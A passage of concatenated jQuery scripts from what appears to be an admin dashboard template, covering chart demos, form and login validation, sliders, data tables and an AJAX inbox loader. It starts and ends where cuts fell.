(series.data[j][0] > pos.x) break; // now interpolate var y, p1 = series.data[j - 1], p2 = series.data[j]; if (p1 == null) y = p2[1]; else if (p2 == null) y = p1[1]; else y = p1[1] + (p2[1] - p1[1]) * (pos.x - p1[0]) / (p2[0] - p1[0]); legends.eq(i).text(series.label.replace(/=.*/, "= " + y.toFixed(2))); } } $("#chart_3").bind("plothover", function (event, pos, item) { latestPosition = pos; if (!updateLegendTimeout) updateLegendTimeout = setTimeout(updateLegend, 50); }); } //Dynamic Chart function chart4() { //server load var options = { series: { shadowSize: 1 }, lines: { show: true, lineWidth: 0.5, fill: true, fillColor: { colors: [{ opacity: 0.1 }, { opacity: 1 } ] } }, yaxis: { min: 0, max: 100, tickColor: "#eee", tickFormatter: function (v) { return v + "%"; } }, xaxis: { show: false, }, colors: ["#6ef146"], grid: { tickColor: "#eee", borderWidth: 0, } }; var updateInterval = 30; var plot = $.plot($("#chart_4"), [getRandomData()], options); function update() { plot.setData([getRandomData()]); plot.draw(); setTimeout(update, updateInterval); } update(); } //bars with controls function chart5() { var d1 = []; for (var i = 0; i <= 10; i += 1) d1.push([i, parseInt(Math.random() * 30)]); var d2 = []; for (var i = 0; i <= 10; i += 1) d2.push([i, parseInt(Math.random() * 30)]); var d3 = []; for (var i = 0; i <= 10; i += 1) d3.push([i, parseInt(Math.random() * 30)]); var stack = 0, bars = true, lines = false, steps = false; function plotWithOptions() { $.plot($("#chart_5"), [{ label: "sales", data: d1, lines: { lineWidth: 1, }, shadowSize: 0 }, { label: "tax", data: d2, lines: { lineWidth: 1, }, shadowSize: 0 }, { label: "profit", data: d3, lines: { lineWidth: 1, }, shadowSize: 0 }] , { series: { stack: stack, lines: { show: lines, fill: true, steps: steps, lineWidth: 0, // in pixels }, bars: { show: bars, barWidth: 0.5, lineWidth: 0, // in pixels shadowSize: 0, align: 'center' } }, grid: { tickColor: "#eee", borderColor: "#eee", borderWidth: 1 } } ); } $(".stackControls input").click(function (e) { e.preventDefault(); stack = $(this).val() == "With stacking" ? true : null; plotWithOptions(); }); $(".graphControls input").click(function (e) { e.preventDefault(); bars = $(this).val().indexOf("Bars") != -1; lines = $(this).val().indexOf("Lines") != -1; steps = $(this).val().indexOf("steps") != -1; plotWithOptions(); }); plotWithOptions(); } //graph chart1(); chart2(); chart3(); chart4(); chart5(); }, initBarCharts: function () { // bar chart: var data = GenerateSeries(0); function GenerateSeries(added){ var data = []; var start = 100 + added; var end = 200 + added; for(i=1;i<=20;i++){ var d = Math.floor(Math.random() * (end - start + 1) + start); data.push([i, d]); start++; end++; } return data; } var options = { series:{ bars:{show: true} }, bars:{ barWidth: 0.8, lineWidth: 0, // in pixels shadowSize: 0, align: 'left' }, grid:{ tickColor: "#eee", borderColor: "#eee", borderWidth: 1 } }; $.plot($("#chart_1_1"), [{ data: data, lines: { lineWidth: 1, }, shadowSize: 0 }] , options); // horizontal bar chart: var data1 = [ [10, 10], [20, 20], [30, 30], [40, 40], [50, 50] ]; var options = { series:{ bars:{show: true} }, bars:{ horizontal:true, barWidth:6, lineWidth: 0, // in pixels shadowSize: 0, align: 'left' }, grid:{ tickColor: "#eee", borderColor: "#eee", borderWidth: 1 } }; $.plot($("#chart_1_2"), [data1], options); }, initPieCharts: function () { var data = []; var series = Math.floor(Math.random() * 10) + 1; series = series < 5 ? 5 : series; for (var i = 0; i < series; i++) { data[i] = { label: "Series" + (i + 1), data: Math.floor(Math.random() * 100) + 1 } } // DEFAULT $.plot($("#pie_chart"), data, { series: { pie: { show: true } } }); // GRAPH 1 $.plot($("#pie_chart_1"), data, { series: { pie: { show: true } }, legend: { show: false } }); // GRAPH 2 $.plot($("#pie_chart_2"), data, { series: { pie: { show: true, radius: 1, label: { show: true, radius: 1, formatter: function (label, series) { return '<div style="font-size:8pt;text-align:center;padding:2px;color:white;">' + label + '<br/>' + Math.round(series.percent) + '%</div>'; }, background: { opacity: 0.8 } } } }, legend: { show: false } }); // GRAPH 3 $.plot($("#pie_chart_3"), data, { series: { pie: { show: true, radius: 1, label: { show: true, radius: 3 / 4, formatter: function (label, series) { return '<div style="font-size:8pt;text-align:center;padding:2px;color:white;">' + label + '<br/>' + Math.round(series.percent) + '%</div>'; }, background: { opacity: 0.5 } } } }, legend: { show: false } }); // GRAPH 4 $.plot($("#pie_chart_4"), data, { series: { pie: { show: true, radius: 1, label: { show: true, radius: 3 / 4, formatter: function (label, series) { return '<div style="font-size:8pt;text-align:center;padding:2px;color:white;">' + label + '<br/>' + Math.round(series.percent) + '%</div>'; }, background: { opacity: 0.5, color: '#000' } } } }, legend: { show: false } }); // GRAPH 5 $.plot($("#pie_chart_5"), data, { series: { pie: { show: true, radius: 3 / 4, label: { show: true, radius: 3 / 4, formatter: function (label, series) { return '<div style="font-size:8pt;text-align:center;padding:2px;color:white;">' + label + '<br/>' + Math.round(series.percent) + '%</div>'; }, background: { opacity: 0.5, color: '#000' } } } }, legend: { show: false } }); // GRAPH 6 $.plot($("#pie_chart_6"), data, { series: { pie: { show: true, radius: 1, label: { show: true, radius: 2 / 3, formatter: function (label, series) { return '<div style="font-size:8pt;text-align:center;padding:2px;color:white;">' + label + '<br/>' + Math.round(series.percent) + '%</div>'; }, threshold: 0.1 } } }, legend: { show: false } }); // GRAPH 7 $.plot($("#pie_chart_7"), data, { series: { pie: { show: true, combine: { color: '#999', threshold: 0.1 } } }, legend: { show: false } }); // GRAPH 8 $.plot($("#pie_chart_8"), data, { series: { pie: { show: true, radius: 300, label: { show: true, formatter: function (label, series) { return '<div style="font-size:8pt;text-align:center;padding:2px;color:white;">' + label + '<br/>' + Math.round(series.percent) + '%</div>'; }, threshold: 0.1 } } }, legend: { show: false } }); // GRAPH 9 $.plot($("#pie_chart_9"), data, { series: { pie: { show: true, radius: 1, tilt: 0.5, label: { show: true, radius: 1, formatter: function (label, series) { return '<div style="font-size:8pt;text-align:center;padding:2px;color:white;">' + label + '<br/>' + Math.round(series.percent) + '%</div>'; }, background: { opacity: 0.8 } }, combine: { color: '#999', threshold: 0.1 } } }, legend: { show: false } }); // DONUT $.plot($("#donut"), data, { series: { pie: { innerRadius: 0.5, show: true } } }); // INTERACTIVE $.plot($("#interactive"), data, { series: { pie: { show: true } }, grid: { hoverable: true, clickable: true } }); $("#interactive").bind("plothover", pieHover); $("#interactive").bind("plotclick", pieClick); function pieHover(event, pos, obj) { if (!obj) return; percent = parseFloat(obj.series.percent).toFixed(2); $("#hover").html('<span style="font-weight: bold; color: ' + obj.series.color + '">' + obj.series.label + ' (' + percent + '%)</span>'); } function pieClick(event, pos, obj) { if (!obj) return; percent = parseFloat(obj.series.percent).toFixed(2); alert('' + obj.series.label + ': ' + percent + '%'); } } }; }();
JavaScript
var UIBlockUI = function () { var handleSample1 = function () { $('#blockui_sample_1_1').click(function(){ App.blockUI({ target: '#blockui_sample_1_portlet_body' }); window.setTimeout(function () { App.unblockUI('#blockui_sample_1_portlet_body'); }, 2000); }); $('#blockui_sample_1_2').click(function(){ App.blockUI({ target: '#blockui_sample_1_portlet_body', boxed: true }); window.setTimeout(function () { App.unblockUI('#blockui_sample_1_portlet_body'); }, 2000); }); } var handleSample2 = function () { $('#blockui_sample_2_1').click(function(){ App.blockUI(); window.setTimeout(function () { App.unblockUI(); }, 2000); }); $('#blockui_sample_2_2').click(function(){ App.blockUI({boxed: true}); window.setTimeout(function () { App.unblockUI(); }, 2000); }); $('#blockui_sample_2_3').click(function(){ App.startPageLoading('Please wait...'); window.setTimeout(function () { App.stopPageLoading(); }, 2000); }); } var handleSample3 = function () { $('#blockui_sample_3_1_0').click(function(){ App.blockUI({ target: '#basic', overlayColor: 'none', cenrerY: true, boxed: true }); window.setTimeout(function () { App.unblockUI('#basic'); }, 2000); }); $('#blockui_sample_3_1').click(function(){ App.blockUI({ target: '#blockui_sample_3_1_element', overlayColor: 'none', boxed: true }); }); $('#blockui_sample_3_1_1').click(function(){ App.unblockUI('#blockui_sample_3_1_element'); }); $('#blockui_sample_3_2').click(function(){ App.blockUI({ target: '#blockui_sample_3_2_element', boxed: true }); }); $('#blockui_sample_3_2_1').click(function(){ App.unblockUI('#blockui_sample_3_2_element'); }); } var handleSample4 = function () { $('#blockui_sample_4_1').click(function(){ App.blockUI({ target: '#blockui_sample_4_portlet_body', boxed: true, message: 'Processing...' }); window.setTimeout(function () { App.unblockUI('#blockui_sample_4_portlet_body'); }, 2000); }); $('#blockui_sample_4_2').click(function(){ App.blockUI({ target: '#blockui_sample_4_portlet_body', iconOnly: true }); window.setTimeout(function () { App.unblockUI('#blockui_sample_4_portlet_body'); }, 2000); }); $('#blockui_sample_4_3').click(function(){ App.blockUI({ target: '#blockui_sample_4_portlet_body', boxed: true, textOnly: true }); window.setTimeout(function () { App.unblockUI('#blockui_sample_4_portlet_body'); }, 2000); }); } return { //main function to initiate the module init: function () { handleSample1(); handleSample2(); handleSample3(); handleSample4(); } }; }();
JavaScript
var FormDropzone = function () { return { //main function to initiate the module init: function () { Dropzone.options.myDropzone = { init: function() { this.on("addedfile", function(file) { // Create the remove button var removeButton = Dropzone.createElement("<button class='btn btn-sm btn-block'>Remove file</button>"); // Capture the Dropzone instance as closure. var _this = this; // Listen to the click event removeButton.addEventListener("click", function(e) { // Make sure the button click doesn't submit the form: e.preventDefault(); e.stopPropagation(); // Remove the file preview. _this.removeFile(file); // If you want to the delete the file on the server as well, // you can do the AJAX request here. }); // Add the button to the file preview element. file.previewElement.appendChild(removeButton); }); } } } }; }();
JavaScript
var FormWizard = function () { return { //main function to initiate the module init: function () { if (!jQuery().bootstrapWizard) { return; } function format(state) { if (!state.id) return state.text; // optgroup return "<img class='flag' src='assets/img/flags/" + state.id.toLowerCase() + ".png'/>&nbsp;&nbsp;" + state.text; } $("#country_list").select2({ placeholder: "Select", allowClear: true, formatResult: format, formatSelection: format, escapeMarkup: function (m) { return m; } }); var form = $('#submit_form'); var error = $('.alert-danger', form); var success = $('.alert-success', form); form.validate({ doNotHideMessage: true, //this option enables to show the error/success messages on tab switch. errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input rules: { //account username: { minlength: 5, required: true }, password: { minlength: 5, required: true }, rpassword: { minlength: 5, required: true, equalTo: "#submit_form_password" }, //profile fullname: { required: true }, email: { required: true, email: true }, phone: { required: true }, gender: { required: true }, address: { required: true }, city: { required: true }, country: { required: true }, //payment card_name: { required: true }, card_number: { minlength: 16, maxlength: 16, required: true }, card_cvc: { digits: true, required: true, minlength: 3, maxlength: 4 }, card_expiry_date: { required: true }, 'payment[]': { required: true, minlength: 1 } }, messages: { // custom messages for radio buttons and checkboxes 'payment[]': { required: "Please select at least one option", minlength: jQuery.format("Please select at least one option") } }, errorPlacement: function (error, element) { // render error placement for each input type if (element.attr("name") == "gender") { // for uniform radio buttons, insert the after the given container error.insertAfter("#form_gender_error"); } else if (element.attr("name") == "payment[]") { // for uniform radio buttons, insert the after the given container error.insertAfter("#form_payment_error"); } else { error.insertAfter(element); // for other inputs, just perform default behavior } }, invalidHandler: function (event, validator) { //display error alert on form submit success.hide(); error.show(); App.scrollTo(error, -200); }, highlight: function (element) { // hightlight error inputs $(element) .closest('.form-group').removeClass('has-success').addClass('has-error'); // set error class to the control group }, unhighlight: function (element) { // revert the change done by hightlight $(element) .closest('.form-group').removeClass('has-error'); // set error class to the control group }, success: function (label) { if (label.attr("for") == "gender" || label.attr("for") == "payment[]") { // for checkboxes and radio buttons, no need to show OK icon label .closest('.form-group').removeClass('has-error').addClass('has-success'); label.remove(); // remove error label here } else { // display success icon for other inputs label .addClass('valid') // mark the current input as valid and display OK icon .closest('.form-group').removeClass('has-error').addClass('has-success'); // set success class to the control group } }, submitHandler: function (form) { success.show(); error.hide(); //add here some ajax code to submit your form or just call form.submit() if you want to submit the form without ajax } }); var displayConfirm = function() { $('#tab4 .form-control-static', form).each(function(){ var input = $('[name="'+$(this).attr("data-display")+'"]', form); if (input.is(":radio")) { input = $('[name="'+$(this).attr("data-display")+'"]:checked', form); } if (input.is(":text") || input.is("textarea")) { $(this).html(input.val()); } else if (input.is("select")) { $(this).html(input.find('option:selected').text()); } else if (input.is(":radio") && input.is(":checked")) { $(this).html(input.attr("data-title")); } else if ($(this).attr("data-display") == 'payment') { var payment = []; $('[name="payment[]"]').each(function(){ payment.push($(this).attr('data-title')); }); $(this).html(payment.join("<br>")); } }); } var handleTitle = function(tab, navigation, index) { var total = navigation.find('li').length; var current = index + 1; // set wizard title $('.step-title', $('#form_wizard_1')).text('Step ' + (index + 1) + ' of ' + total); // set done steps jQuery('li', $('#form_wizard_1')).removeClass("done"); var li_list = navigation.find('li'); for (var i = 0; i < index; i++) { jQuery(li_list[i]).addClass("done"); } if (current == 1) { $('#form_wizard_1').find('.button-previous').hide(); } else { $('#form_wizard_1').find('.button-previous').show(); } if (current >= total) { $('#form_wizard_1').find('.button-next').hide(); $('#form_wizard_1').find('.button-submit').show(); displayConfirm(); } else { $('#form_wizard_1').find('.button-next').show(); $('#form_wizard_1').find('.button-submit').hide(); } App.scrollTo($('.page-title')); } // default form wizard $('#form_wizard_1').bootstrapWizard({ 'nextSelector': '.button-next', 'previousSelector': '.button-previous', onTabClick: function (tab, navigation, index, clickedIndex) { success.hide(); error.hide(); if (form.valid() == false) { return false; } handleTitle(tab, navigation, clickedIndex); }, onNext: function (tab, navigation, index) { success.hide(); error.hide(); if (form.valid() == false) { return false; } handleTitle(tab, navigation, index); }, onPrevious: function (tab, navigation, index) { success.hide(); error.hide(); handleTitle(tab, navigation, index); }, onTabShow: function (tab, navigation, index) { var total = navigation.find('li').length; var current = index + 1; var $percent = (current / total) * 100; $('#form_wizard_1').find('.progress-bar').css({ width: $percent + '%' }); } }); $('#form_wizard_1').find('.button-previous').hide(); $('#form_wizard_1 .button-submit').click(function () { alert('Finished! Hope you like it :)'); }).hide(); } }; }();
JavaScript
var Login = function () { var handleLogin = function() { $('.login-form').validate({ errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input rules: { username: { required: true }, password: { required: true }, remember: { required: false } }, messages: { username: { required: "Username is required." }, password: { required: "Password is required." } }, invalidHandler: function (event, validator) { //display error alert on form submit $('.alert-danger', $('.login-form')).show(); }, highlight: function (element) { // hightlight error inputs $(element) .closest('.form-group').addClass('has-error'); // set error class to the control group }, success: function (label) { label.closest('.form-group').removeClass('has-error'); label.remove(); }, errorPlacement: function (error, element) { error.insertAfter(element.closest('.input-icon')); }, submitHandler: function (form) { form.submit(); } }); $('.login-form input').keypress(function (e) { if (e.which == 13) { if ($('.login-form').validate().form()) { $('.login-form').submit(); } return false; } }); } var handleForgetPassword = function () { $('.forget-form').validate({ errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input ignore: "", rules: { email: { required: true, email: true } }, messages: { email: { required: "Email is required." } }, invalidHandler: function (event, validator) { //display error alert on form submit }, highlight: function (element) { // hightlight error inputs $(element) .closest('.form-group').addClass('has-error'); // set error class to the control group }, success: function (label) { label.closest('.form-group').removeClass('has-error'); label.remove(); }, errorPlacement: function (error, element) { error.insertAfter(element.closest('.input-icon')); }, submitHandler: function (form) { form.submit(); } }); $('.forget-form input').keypress(function (e) { if (e.which == 13) { if ($('.forget-form').validate().form()) { $('.forget-form').submit(); } return false; } }); jQuery('#forget-password').click(function () { jQuery('.login-form').hide(); jQuery('.forget-form').show(); }); jQuery('#back-btn').click(function () { jQuery('.login-form').show(); jQuery('.forget-form').hide(); }); } var handleRegister = function () { function format(state) { if (!state.id) return state.text; // optgroup return "<img class='flag' src='assets/img/flags/" + state.id.toLowerCase() + ".png'/>&nbsp;&nbsp;" + state.text; } $("#select2_sample4").select2({ placeholder: '<i class="fa fa-map-marker"></i>&nbsp;Select a Country', allowClear: true, formatResult: format, formatSelection: format, escapeMarkup: function (m) { return m; } }); $('#select2_sample4').change(function () { $('.register-form').validate().element($(this)); //revalidate the chosen dropdown value and show error or success message for the input }); $('.register-form').validate({ errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input ignore: "", rules: { fullname: { required: true }, email: { required: true, email: true }, address: { required: true }, city: { required: true }, country: { required: true }, username: { required: true }, password: { required: true }, rpassword: { equalTo: "#register_password" }, tnc: { required: true } }, messages: { // custom messages for radio buttons and checkboxes tnc: { required: "Please accept TNC first." } }, invalidHandler: function (event, validator) { //display error alert on form submit }, highlight: function (element) { // hightlight error inputs $(element) .closest('.form-group').addClass('has-error'); // set error class to the control group }, success: function (label) { label.closest('.form-group').removeClass('has-error'); label.remove(); }, errorPlacement: function (error, element) { if (element.attr("name") == "tnc") { // insert checkbox errors after the container error.insertAfter($('#register_tnc_error')); } else if (element.closest('.input-icon').size() === 1) { error.insertAfter(element.closest('.input-icon')); } else { error.insertAfter(element); } }, submitHandler: function (form) { form.submit(); } }); $('.register-form input').keypress(function (e) { if (e.which == 13) { if ($('.register-form').validate().form()) { $('.register-form').submit(); } return false; } }); jQuery('#register-btn').click(function () { jQuery('.login-form').hide(); jQuery('.register-form').show(); }); jQuery('#register-back-btn').click(function () { jQuery('.login-form').show(); jQuery('.register-form').hide(); }); } return { //main function to initiate the module init: function () { handleLogin(); handleForgetPassword(); handleRegister(); $.backstretch([ "assets/img/bg/1.jpg", "assets/img/bg/2.jpg", "assets/img/bg/3.jpg", "assets/img/bg/4.jpg" ], { fade: 1000, duration: 8000 }); } }; }();
JavaScript
var ComponentsNoUiSliders = function () { return { //main function to initiate the module init: function () { // slider 1 $("#slider_1").noUiSlider({ start: [20, 80] ,range: [0, 100] ,connect: true ,handles: 2 }); // slider 2 $('#slider_2').noUiSlider({ range: [-20,40] ,start: [10,30] ,handles: 2 ,connect: true ,step: 1 ,serialization: { to: [$('#slider_2_input_start'), $('#slider_2_input_end')] ,resolution: 1 } }); // slider 3 $("#slider_3").noUiSlider({ start: [20, 80] ,range: [0, 100] ,connect: true ,handles: 2 }); $("#slider_3_checkbox").change(function(){ // If the checkbox is checked if ($(this).is(":checked")) { // Disable the slider $("#slider_3").attr("disabled", "disabled"); } else { // Enabled the slider $("#slider_3").removeAttr("disabled"); } }); // slider 4 $("#slider_4").noUiSlider({ start: [20, 80] ,range: [0, 100] ,connect: true ,handles: 2 }); $("#slider_4_btn").click(function(){ alert($("#slider_4").val()); }); } }; }();
JavaScript
var FormValidation = function () { var handleValidation1 = function() { // for more info visit the official plugin documentation: // http://docs.jquery.com/Plugins/Validation var form1 = $('#form_sample_1'); var error1 = $('.alert-danger', form1); var success1 = $('.alert-success', form1); form1.validate({ errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input ignore: "", rules: { name: { minlength: 2, required: true }, email: { required: true, email: true }, url: { required: true, url: true }, number: { required: true, number: true }, digits: { required: true, digits: true }, creditcard: { required: true, creditcard: true }, occupation: { minlength: 5, }, category: { required: true } }, invalidHandler: function (event, validator) { //display error alert on form submit success1.hide(); error1.show(); App.scrollTo(error1, -200); }, highlight: function (element) { // hightlight error inputs $(element) .closest('.form-group').addClass('has-error'); // set error class to the control group }, unhighlight: function (element) { // revert the change done by hightlight $(element) .closest('.form-group').removeClass('has-error'); // set error class to the control group }, success: function (label) { label .closest('.form-group').removeClass('has-error'); // set success class to the control group }, submitHandler: function (form) { success1.show(); error1.hide(); } }); } var handleValidation2 = function() { // for more info visit the official plugin documentation: // http://docs.jquery.com/Plugins/Validation var form2 = $('#form_sample_2'); var error2 = $('.alert-danger', form2); var success2 = $('.alert-success', form2); form2.validate({ errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input ignore: "", rules: { name: { minlength: 2, required: true }, email: { required: true, email: true }, email: { required: true, email: true }, url: { required: true, url: true }, number: { required: true, number: true }, digits: { required: true, digits: true }, creditcard: { required: true, creditcard: true }, }, invalidHandler: function (event, validator) { //display error alert on form submit success2.hide(); error2.show(); App.scrollTo(error2, -200); }, errorPlacement: function (error, element) { // render error placement for each input type var icon = $(element).parent('.input-icon').children('i'); icon.removeClass('fa-check').addClass("fa-warning"); icon.attr("data-original-title", error.text()).tooltip({'container': 'body'}); }, highlight: function (element) { // hightlight error inputs $(element) .closest('.form-group').addClass('has-error'); // set error class to the control group }, unhighlight: function (element) { // revert the change done by hightlight }, success: function (label, element) { var icon = $(element).parent('.input-icon').children('i'); $(element).closest('.form-group').removeClass('has-error').addClass('has-success'); // set success class to the control group icon.removeClass("fa-warning").addClass("fa-check"); }, submitHandler: function (form) { success2.show(); error2.hide(); } }); } var handleValidation3 = function() { // for more info visit the official plugin documentation: // http://docs.jquery.com/Plugins/Validation var form3 = $('#form_sample_3'); var error3 = $('.alert-danger', form3); var success3 = $('.alert-success', form3); //IMPORTANT: update CKEDITOR textarea with actual content before submit form3.on('submit', function() { for(var instanceName in CKEDITOR.instances) { CKEDITOR.instances[instanceName].updateElement(); } }) form3.validate({ errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input ignore: "", rules: { name: { minlength: 2, required: true }, email: { required: true, email: true }, category: { required: true }, options1: { required: true }, options2: { required: true }, occupation: { minlength: 5, }, membership: { required: true }, service: { required: true, minlength: 2 }, markdown: { required: true }, editor1: { required: true }, editor2: { required: true } }, messages: { // custom messages for radio buttons and checkboxes membership: { required: "Please select a Membership type" }, service: { required: "Please select at least 2 types of Service", minlength: jQuery.format("Please select at least {0} types of Service") } }, errorPlacement: function (error, element) { // render error placement for each input type if (element.parent(".input-group").size() > 0) { error.insertAfter(element.parent(".input-group")); } else if (element.attr("data-error-container")) { error.appendTo(element.attr("data-error-container")); } else if (element.parents('.radio-list').size() > 0) { error.appendTo(element.parents('.radio-list').attr("data-error-container")); } else if (element.parents('.radio-inline').size() > 0) { error.appendTo(element.parents('.radio-inline').attr("data-error-container")); } else if (element.parents('.checkbox-list').size() > 0) { error.appendTo(element.parents('.checkbox-list').attr("data-error-container")); } else if (element.parents('.checkbox-inline').size() > 0) { error.appendTo(element.parents('.checkbox-inline').attr("data-error-container")); } else { error.insertAfter(element); // for other inputs, just perform default behavior } }, invalidHandler: function (event, validator) { //display error alert on form submit success3.hide(); error3.show(); App.scrollTo(error3, -200); }, highlight: function (element) { // hightlight error inputs $(element) .closest('.form-group').addClass('has-error'); // set error class to the control group }, unhighlight: function (element) { // revert the change done by hightlight $(element) .closest('.form-group').removeClass('has-error'); // set error class to the control group }, success: function (label) { label .closest('.form-group').removeClass('has-error'); // set success class to the control group }, submitHandler: function (form) { success3.show(); error3.hide(); } }); //apply validation on select2 dropdown value change, this only needed for chosen dropdown integration. $('.select2me', form3).change(function () { form3.validate().element($(this)); //revalidate the chosen dropdown value and show error or success message for the input }); } var handleWysihtml5 = function() { if (!jQuery().wysihtml5) { return; } if ($('.wysihtml5').size() > 0) { $('.wysihtml5').wysihtml5({ "stylesheets": ["assets/plugins/bootstrap-wysihtml5/wysiwyg-color.css"] }); } } return { //main function to initiate the module init: function () { handleWysihtml5(); handleValidation1(); handleValidation2(); handleValidation3(); } }; }();
JavaScript
var TableManaged = function () { return { //main function to initiate the module init: function () { if (!jQuery().dataTable) { return; } // begin first table $('#sample_1').dataTable({ "aoColumns": [ { "bSortable": false }, null, { "bSortable": false, "sType": "text" }, null, { "bSortable": false }, { "bSortable": false } ], "aLengthMenu": [ [5, 15, 20, -1], [5, 15, 20, "All"] // change per page values here ], // set the initial value "iDisplayLength": 5, "sPaginationType": "bootstrap", "oLanguage": { "sLengthMenu": "_MENU_ records", "oPaginate": { "sPrevious": "Prev", "sNext": "Next" } }, "aoColumnDefs": [ { 'bSortable': false, 'aTargets': [0] }, { "bSearchable": false, "aTargets": [ 0 ] } ] }); jQuery('#sample_1 .group-checkable').change(function () { var set = jQuery(this).attr("data-set"); var checked = jQuery(this).is(":checked"); jQuery(set).each(function () { if (checked) { $(this).attr("checked", true); $(this).parents('tr').addClass("active"); } else { $(this).attr("checked", false); $(this).parents('tr').removeClass("active"); } }); jQuery.uniform.update(set); }); jQuery('#sample_1').on('change', 'tbody tr .checkboxes', function(){ $(this).parents('tr').toggleClass("active"); }); jQuery('#sample_1_wrapper .dataTables_filter input').addClass("form-control input-medium input-inline"); // modify table search input jQuery('#sample_1_wrapper .dataTables_length select').addClass("form-control input-xsmall"); // modify table per page dropdown //jQuery('#sample_1_wrapper .dataTables_length select').select2(); // initialize select2 dropdown // begin second table $('#sample_2').dataTable({ "aLengthMenu": [ [5, 15, 20, -1], [5, 15, 20, "All"] // change per page values here ], // set the initial value "iDisplayLength": 5, "sPaginationType": "bootstrap", "oLanguage": { "sLengthMenu": "_MENU_ records", "oPaginate": { "sPrevious": "Prev", "sNext": "Next" } }, "aoColumnDefs": [ { 'bSortable': false, 'aTargets': [0] }, { "bSearchable": false, "aTargets": [ 0 ] } ] }); jQuery('#sample_2 .group-checkable').change(function () { var set = jQuery(this).attr("data-set"); var checked = jQuery(this).is(":checked"); jQuery(set).each(function () { if (checked) { $(this).attr("checked", true); } else { $(this).attr("checked", false); } }); jQuery.uniform.update(set); }); jQuery('#sample_2_wrapper .dataTables_filter input').addClass("form-control input-small input-inline"); // modify table search input jQuery('#sample_2_wrapper .dataTables_length select').addClass("form-control input-xsmall"); // modify table per page dropdown jQuery('#sample_2_wrapper .dataTables_length select').select2(); // initialize select2 dropdown // begin: third table $('#sample_3').dataTable({ "aLengthMenu": [ [5, 15, 20, -1], [5, 15, 20, "All"] // change per page values here ], // set the initial value "iDisplayLength": 5, "sPaginationType": "bootstrap", "oLanguage": { "sLengthMenu": "_MENU_ records", "oPaginate": { "sPrevious": "Prev", "sNext": "Next" } }, "aoColumnDefs": [ { 'bSortable': false, 'aTargets': [0] }, { "bSearchable": false, "aTargets": [ 0 ] } ] }); jQuery('#sample_3 .group-checkable').change(function () { var set = jQuery(this).attr("data-set"); var checked = jQuery(this).is(":checked"); jQuery(set).each(function () { if (checked) { $(this).attr("checked", true); } else { $(this).attr("checked", false); } }); jQuery.uniform.update(set); }); jQuery('#sample_3_wrapper .dataTables_filter input').addClass("form-control input-small input-inline"); // modify table search input jQuery('#sample_3_wrapper .dataTables_length select').addClass("form-control input-xsmall"); // modify table per page dropdown jQuery('#sample_3_wrapper .dataTables_length select').select2(); // initialize select2 dropdown } }; }();
JavaScript
var Inbox = function () { var content = $('.inbox-content'); var loading = $('.inbox-loading'); var listListing = ''; var loadInbox = function (el, name) { var url = 'inbox_inbox.html'; var title = $('.inbox-nav > li.' + name + ' a').attr('data-title'); listListing = name; loading.show(); content.html(''); toggleButton(el); $.ajax({ type: "GET", cache: false, url: url, dataType: "html", success: function(res) { toggleButton(el); $('.inbox-nav > li.active').removeClass('active'); $('.inbox-nav > li.' + name).addClass('active'); $('.inbox-header > h1').text(title); loading.hide(); content.html(res); App.fixContentHeight(); App.initUniform(); }, error: function(xhr, ajaxOptions, thrownError) { toggleButton(el); }, async: false }); // handle group checkbox: jQuery('body').on('change', '.mail-group-checkbox', function () { var set = jQuery('.mail-checkbox'); var checked = jQuery(this).is(":checked"); jQuery(set).each(function () { $(this).attr("checked", checked); }); jQuery.uniform.update(set); }); } var loadMessage = function (el, name, resetMenu) { var url = 'inbox_view.html'; loading.show(); content.html(''); toggleButton(el); var message_id = el.parent('tr').attr("data-messageid"); $.ajax({ type: "GET", cache: false, url: url, dataType: "html", data: {'message_id': message_id}, success: function(res) { toggleButton(el); if (resetMenu) { $('.inbox-nav > li.active').removeClass('active'); } $('.inbox-header > h1').text('View Message'); loading.hide(); content.html(res); App.fixContentHeight(); App.initUniform(); }, error: function(xhr, ajaxOptions, thrownError) { toggleButton(el); }, async: false }); } var initWysihtml5 = function () { $('.inbox-wysihtml5').wysihtml5({ "stylesheets": ["assets/plugins/bootstrap-wysihtml5/wysiwyg-color.css"] }); } var initFileupload = function () { $('#fileupload').fileupload({ // Uncomment the following to send cross-domain cookies: //xhrFields: {withCredentials: true}, url: 'assets/plugins/jquery-file-upload/server/php/', autoUpload: true }); // Upload server status check for browsers with CORS support: if ($.support.cors) { $.ajax({ url: 'assets/plugins/jquery-file-upload/server/php/', type: 'HEAD' }).fail(function () { $('<span class="alert alert-error"/>') .text('Upload server currently unavailable - ' + new Date()) .appendTo('#fileupload'); }); } } var loadCompose = function (el) { var url = 'inbox_compose.html'; loading.show(); content.html(''); toggleButton(el); // load the form via ajax $.ajax({ type: "GET", cache: false, url: url, dataType: "html", success: function(res) { toggleButton(el); $('.inbox-nav > li.active').removeClass('active'); $('.inbox-header > h1').text('Compose'); loading.hide(); content.html(res); initFileupload(); initWysihtml5(); $('.inbox-wysihtml5').focus(); App.fixContentHeight(); App.initUniform(); }, error: function(xhr, ajaxOptions, thrownError) { toggleButton(el); }, async: false }); } var loadReply = function (el) { var url = 'inbox_reply.html'; loading.show(); content.html(''); toggleButton(el); // load the form via ajax $.ajax({ type: "GET", cache: false, url: url, dataType: "html", success: function(res) { toggleButton(el); $('.inbox-nav > li.active').removeClass('active'); $('.inbox-header > h1').text('Reply'); loading.hide(); content.html(res); $('[name="message"]').val($('#reply_email_content_body').html()); handleCCInput(); // init "CC" input field initFileupload(); initWysihtml5(); App.fixContentHeight(); App.initUniform(); }, error: function(xhr, ajaxOptions, thrownError) { toggleButton(el); }, async: false }); } var loadSearchResults = function (el) { var url = 'inbox_search_result.html'; loading.show(); content.html(''); toggleButton(el); $.ajax({ type: "GET", cache: false, url: url, dataType: "html", success: function(res) { toggleButton(el); $('.inbox-nav > li.active').removeClass('active'); $('.inbox-header > h1').text('Search'); loading.hide(); content.html(res); App.fixContentHeight(); App.initUniform(); }, error: function(xhr, ajaxOptions, thrownError) { toggleButton(el); 